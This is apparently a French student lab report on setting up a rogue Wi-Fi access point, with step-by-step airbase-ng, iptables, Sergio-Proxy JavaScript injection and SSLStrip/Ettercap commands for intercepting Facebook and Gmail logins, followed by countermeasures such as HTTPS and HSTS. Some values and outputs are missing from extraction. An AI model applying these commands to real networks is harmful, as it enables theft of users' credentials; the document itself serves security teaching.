Rogue AP NOUR SAADALLAH (RT3) SAFA FAKHFAKH (GL3) MEHER BEN SAID (GL3) SALMA SGHAIER (RT3) NABIL MEKNI (GL3)

Transcription

1 Rogue AP NOUR SAADALLAH (RT3) SAFA FAKHFAKH (GL3) MEHER BEN SAID (GL3) SALMA SGHAIER (RT3) NABIL MEKNI (GL3)

2 Table des matières I.Présentation de l atelier Définition Architecture générale du réseau...2 II.Les outils utilisés kali Linux: Airmon-ng Airbase-ng Sergio-Proxy IPtables SSLsrtip Ettercap...6 III.Topologie du réseau Structure réseau : Principe de fonctionnement :...8 IV.Configuration des outils et tests Création de la Rogue AP Injection du code : redirection des pages web de la machine cible vers une page: sslstrip : a. test 1 : Pour un compte facebook : b. test 2 : Pour un compte gmail: V.Les solutions contre cette attaque: VI.Conclusion

3 I.Présentation de l atelier 1. Définition Un rogue access point est un point d accès sans fils non autorisé qui a été créé afin de permettre à un hacker de procéder à une attaque du type man-in-the-middle. Pour les victimes qui sont connectées au rogue AP, ce dernier peut paraître comme un point d accès régulier puisqu il peut assurer un accès fluide et transparent à internet. Mais il permet de réaliser plusieurs attaques : Récupération de trafic, redirection vers des sites (potentiellement malicieux), injection de code (scripts ) ou de virus(/trojans/malwares). 2. Architecture générale du réseau Un rogue AP peut être installé sur un réseau d entreprise sécurisé (par une personne ayant accès aux locaux de l entreprise) afin de permettre l accès à ce réseau à des partis non autorisés. L architecture est donc la suivante : 2

4 Dans notre cas, on va utiliser le rogue AP sur un petit réseau et un nombre de victimes limités (en étant MITM) : Tout le trafic généré par les victimes sera visible sur notre machine et on pourra ainsi récupérer toutes sortes de données! 3

5 II. Les outils utilisés Différents outils ont été utilisés pour configurer une rogue AP : 1.kali Linux: Kali Linux est une distribution Linux de tests d intrusion et d audit de Sécurité informatique très avancée qui suit complètement les normes et standards de développement de Debian. Cette distribution Linux est installable comme la plupart des distributions sur une clé USB bootable, une image ISO ou sur une machine virtuelle de type Virtual Box pour tester la configuration sous un environnement virtuel ou un serveur. Kali Linux offre près de 300 outils nécessaires aux tests de sécurité d un système d information afin de permettre au professionnel de la sécurité et aux entreprises de tester la robustesse de leur système et de leurs réseaux. Par exemple, il est capable de cracker des clés WEP/WPA. Pour finir, la distribution fonctionne maintenant sur des architectures ARM comme les Chromebooks, le Raspberry Pi. 4

6 2.Airmon-ng Airmon-ng est un petit script qui permettra de passer la carte wifi en mode dit «monitor» Concrètement ça signifie qu elle va être utilisée pour «observer» tout le trafic réseau environnant, et non pour discuter avec l un d eux. 3.Airbase-ng Airbase-ng est un outil de la suite aircrack-ng permettant de réaliser certaines attaques en créant de faux points d'accès wifi (fake AP) via une carte réseau wi-fi. Cela ouvre l accès à une multitude de techniques permettant de récupérer soit la clé WEP (Wired Equivalent Privacy) du réseau légitime, soit WPA (Wi-Fi Protected Access), et même WPA2, mais également de voler les cookies de la victime utilisant le réseau. 4. Sergio-Proxy Sergio-proxy est un proxy HTTP transparent multi-thread qui manipule le trafic Web, il a été créé pour faire face à certaines lacunes des filtres Ettercap lors de la modification du trafic HTTP. Sergio Proxy a un certain nombre de plugins utiles qui permettent de configurer l'attaque MITM, injecter des données arbitraires dans la session, lancer des attaques de navigateurs depuis Metasploit, et dynamiquement remplacer les fichiers avec les versions malveillantes. L injection peut se faire sous 2 formes : soit un script javascript, soit un fichier HTML. 5. IPtables Iptables est un logiciel libre de l'espace utilisateur Linux.C'est la commande permettant de paramétrer le filtre Netfilter du noyau et donc de configurer son firewall. Netfilter est le module qui fournit au noyau Linux les fonctions de pare-feu, de partage de connexions internet (NAT) et d'historisation du trafic réseau, Il intercepte et manipule les paquets IP avant et après le routage. Iptables permet à un administrateur réseaux de configurer Netfilter en mode utilisateur et configure la gestion des paquets réseaux IPv4. 5

7 6. SSLsrtip Sslstrip est un logiciel développé en Python par Moxie Marlinspike qui permet de détourner du trafic sécurisé https en le redirigeant vers du http en donnant l'illusion à la victime qu'elle est bien sur une connexion sécurisée et en gardant en mémoire tout ce qui a changé en créant une map (carte). Résultat: -le serveur ne voit rien, pour lui la connexion est toujours encryptée -le client ne voit aucun message d'alerte dans son navigateur -l'attaquant peut sniffer toutes les données car elles transitent en clair Sslstrip va donc falsifier les réponses aux requêtes favicon (une favicon est la petite image située à gauche de la barre d'adresse du navigateur) du navigateur, et afficher en guise de favicon un petit cadenas, comme celui ci: 7.Ettercap Ettercap est un logiciel libre d'analyse du réseau informatique. Il est capable de: -Intercepter le trafic sur un segment réseau. -Infecter, remplacer et supprimer des données dans une connexion. -Fournir aux victimes de faux certificats SSL dans des sessions HTTPS. -Capturer les mots de passe. -Réaliser des attaques dites de l'homme du milieu (Man In The Middle) contre un certain nombre de protocoles de communication usuels tels que HTTP, FTP et certains protocoles chiffrés. 6

8 III. Topologie du réseau 1. Structure réseau : On distingue 2 types de rogue AP : Un faux point d accès installé sur un réseau sécurisé de l entreprise sans aucune autorisation de la part de l administrateur du réseau local : ce rogue AP menace les grandes organisations avec un nombre important d employés, car n importe quelle personne ayant un accès aux locaux de l entreprise peut installer ( avec ou sans mauvaise intention) un routeur wifi peu couteux qui peut permettre à des parties non autorisés d accéder à des zones sécurisées du réseau. Un faux point d accès crée pour permettre au pirate d effectuer une attaque man in the middle : ce rogue AP cible les réseaux qui n utilisent pas une authentification mutuelle (client-serveur, serveur-client). Nous avons choisi de travailler avec le 2eme type ( man in the middle). 7

9 2. Principe de fonctionnement : La machine victime se connecte sur le faux point d accès. Le trafic internet de cette dernière est routé à travers le hacker. Une fois obtenu, le pirate le manipule et le bloque en utilisant sslstrip ce qui lui permettra de forcer la victime à utiliser http et par conséquent, il pourra capturer les noms d utilisateurs et les mots de passe que la victime saisit. Une fois sslstrip termine la manipulation el le blocage de trafic internet des victimes, le hacker redirigera ce dernier vers le routeur qui à son tour le redirigera vers le site web demandé. En gros, le hacker se place entre la victime et le site web, ce qui lui permet d intercepter les interactions entre ces derniers. 8

10 IV. Configuration des outils et tests Vous utilisez surement une machine qui dispose de deux interfaces réseau : -une interface sans-fil (wlan0) : pour le partage de connexion. -une interface filaire (eth0): connectée à Internet. Pour le partage de réseau: -On aura besoin d'un réseau wifi. -On fera appel à un serveur DHCP pour attribuer des adresses IP aux clients (ainsi que les infos passerelle et DNS) -On configurera la machine de façon à autoriser le transfert du trafic d une interface à l autre. 1. Création de la Rogue AP a. Création d'un réseau wifi ("WIFI gratuit" qui sera visible à la victime en utilisant les commandes) : airmon-ng start $ROGUE_IFACE : permet d'activer/désactiver le mode moniteur d'une carte wifi. Dans ce mode la carte wifi, se place en «observateur» du réseau. airbase-ng -c 3 -e 'WIFI gratuit' mon0 : cette commande est destinée à l'attaque de clients elle permet à la machine de se comporter comme un point d'accès complet. --> Ces 2 commandes sont de l'outil Aircrack-ng qui est en fait un logiciel spécialement conçu pour tester la sécurité d'un réseau Wifi. Il met à la disposition de l'utilisateur toute une panoplie d'outils permettant de réaliser efficacement ce genre de besogne. 9

11 b. Partage du réseau internet reçu par l'interface "NET_IFACE" à travers l'interface "ROGUE_IFACE" (activer le serveur DHCP) Vous allez remarquer qu'on a regroupé les commandes à utiliser dans le script "partie1", c'est juste pour faciliter l'exécution de celles ci. La commande iptables -t nat c est pour consulter la table nat contenant des paquets qui créent une nouvelle connexion, -A POSTROUTING pour ajouter l'option postrouting qui permet de modifier les paquets sortants, -o wlan0 l'interface de sortie, -j MASQUERADE : l'action à faire qui dans notre cas est le natting (qui permet aux machines avec des adresses privées de communiquer via internet) 10

12 La machine victime s est connectée sur notre réseau : 2. Injection du code : Le principal intérêt d un faux point d'accès, c est de se retrouver naturellement en mode «Man In The Middle» : se situer entre la cible et le reste du réseau ainsi tout le trafic passe par notre machine. C'est dans ce cadre qu'on introduit le Sergio-Proxy qui, entre récupération du trafic et modification «en live» de celui-ci, permet plusieurs scénarios d'attaques. Pour activer le sergio-proxy sur notre machine: cd /pentest/web/ wget 3- tar -xf sergio-proxy-v0.2.1.tar.gz rm sergio-proxy-v0.2.1.tar.gz Le programme est désormais disponible dans le dossier /pentest/web/sergio-proxy. Il faut se placer dans ce dossier avant de lancer l outil et le rendre exécutable : cd /pentest/web/sergio-proxy/ 11

13 chmod +x sergio-proxy.py./sergio-proxy.py help Pour que le trafic de la cible soit détourné vers sergio-proxy on va rediriger le port 80 (http) vers le port (par défaut pour sergio-proxy): iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to :10000 ici la commande iptables va altérer les paquets (dont le protocole de transport est tcp et le port est 80) dès leurs réception et les renvoie à la destination sur le port pour que sergio-proxy stocke tout ce qu il récupère dans un fichier texte on utilise la commande suivante : cd /pentest/web/sergio-proxy/ chmod +x sergio-proxy.p./sergio-proxy.py -l w /tmp/log.txt Voici maintenant quelques attaques qu'on peut effectuer sur la machine de la cible : 1-Retourner toutes les images de tous les sites (http) que la cible va visiter: (cette attaque ne se base pas sur une injection de code ). 12

14 Remarque: Avant de commencer l'injection silencieuse du code dans les pages web visitées par la cible, il faut activer le serveur web sur notre machine par la commande: /etc/init.d/apache2 start. 2- injection du code "Souriez, vous êtes piratés" dans une popup (moyennant le javascript ):./sergio-proxy.py -l w /tmp/sergio-log.txt --inject --html-payload "<script>alert(\"souriez, vous êtes piratés :-)\"):</script>" 3- injection du code "T'as un antivirus et t'es piraté, allo quoi" dans une popup( moyennant un fichier HTML ) : - Placer dans un fichier HTML /var/www/popup.js le code suivant : settimeout(function() { alert("t'as un antivirus et t'es piraté, allo quoi!") },5000); - Executer la commande :./sergio-proxy.py -l w /tmp/sergio-log.txt --inject --js-url --rate-limit 10 --match-str "</head>" 13

15 3. redirection des pages web de la machine cible vers une page: - Placer dans un fichier HTML /var/www/redirect.js le code suivant : window.settimeout(function(){ <! window.location = " //--> },3000); - Executer la commande :./sergio-proxy.py -l w /tmp/sergio-log.txt --inject --js-url --rate-limit 10 --per-domain" 14

16 4. SSLStrip : Pour intercepter les données personnelles de la machine cible telles que les logins et les mots de passe il suffit de taper la commande : Sslstrip f p k Ainsi on peut trouver ces données dans le fichier sslstrip.log: cat sslstrip.log (dans un nouveau terminal) 15

17 a. test 1 : Pour un compte facebook : Pour afficher ces données en temps réel on utilise la commande : ettercap -p -u -T -q -i at0( dans un nouveau terminal) // il manque ici le résultat sur le terminal 16

18 b. test 2 : Pour un compte gmail: Affichage des donnés en temps réel : Le contenu de fichier de trace «sslstrip.log» : 17

19 Remarque : SSLStrip devrait marcher sur tous les navigateurs. Cette attaque échouera avec les navigateurs Firefox et chrome pour les sites protégés avec HSTS (comme par exemple google.com et facebook.com).internet Explorer n'est pas conforme avec la norme RFC-6797 qui décrit la mesure de sécurité HSTS ce qui le rend plus susceptible aux attaques similaires à SSLStrip. Le protocole HSTS (HTTP Strict Transport Security),qui permet de renforcer la sécurité en ligne, n'est pas encore utilisé en masse. Ce mécanisme permettrait de renforcer la sécurité des sites visités, et des comptes qui y sont associés et ce en permettant les serveurs web de déclarer aux navigateurs web clients que l'interaction ne sera faite que via le protocole HTTPS. Notamment, dans le cas de réseaux Wi-Fi non fiables ou de connexions manquant de cryptage. Actuellement (2010), le protocole est en cours de standardisation par le IETF (Internet Engineering Task Force) et deux navigateurs très populaires le prennent déjà en charge :Il s'agit de Chrome et de FireFox (Microsoft n'a toujours pas implémenté le protocole HSTS). V.Les solutions contre cette attaque: L attaque Man In The Middle illustre la plus grande faille d une connexion en https. Cette attaque ne fonctionne pas sur tous les réseaux. Les réseaux les mieux protégés possèdent en effet des défenses permettant de contrer l arppoisoning. Il faut savoir que de plus en plus de sites proposent une navigation totalement en https dès la page d accueil. Les concepteurs de ces sites ont bien compris que le protocole SSL était sensible aux attaques Man In The Middle. Si la navigation est chiffrée du début à la fin il sera impossible de déchiffrer les données même si celles-ci sont interceptées. Il faudrait une puissance de calcul énorme pour réaliser cet exploit qu une personne seule ne peut pas posséder. Donc au niveau de l utilisateur il est souhaitable que celui-ci ouvre la page d accueil directement en https au lieu d http. Cependant lorsqu on n est pas certain du réseau sur lequel on est connecté, la meilleure façon de se protéger est de rester vigilant en évitant de s authentifier sur des sites sensibles lorsque ceux-ci ne proposent pas une navigation sécurisée dès la page d accueil. Idéalement les règles à respecter sont : de vérifier que la barre d adresses soit bien en https lorsque la navigation devrait se faire en SSL. de regarder le certificat du site web afin de voir dans un premier temps sa présence puis dans un second temps qu il est correctement signé. 18

20 d éviter d acheter sur des sites étrangers car la législation qui s y applique en cas de problème n est pas celle de la France. Le consommateur peut se retrouver piégé en cas de problème. de vérifier les coordonnées du cybercommerçant lors d un achat car la loi Française oblige ceuxci des les communiquer sur leur site. En cas d absence d adresse ou présence d adresse étrangère, il faut se méfier. On peut également se protéger contre ce type d'attaques grâce aux IPS IDS (Intrusion Detection System): C'est un mécanisme écoutant le trafic réseau de manière furtive afin de repérer des activités anormales ou suspectes et permettant ainsi d'avoir une action de prévention sur les risques d'intrusion. Ces règles ne sont pas exhaustives et peuvent en plus évoluer au cours du temps car la sécurité évolue toujours très vite. VI. Conclusion On a vu à quel point il est relativement simple de créer un rogue AP même si les attaques réalisées grâce à ce dernier sont très puissantes et dangereuses. Et c'est pourquoi il faut avoir conscience de la notion de "sécurité informatique" dans un monde où tout est connecté et prendre les mesures nécessaires contre les éventuelles attaques. «La sécurité est un compromis avant tout. Étant donné Que l on doit laisser passer des flux, on laisse automatiquement passer des attaques.» 19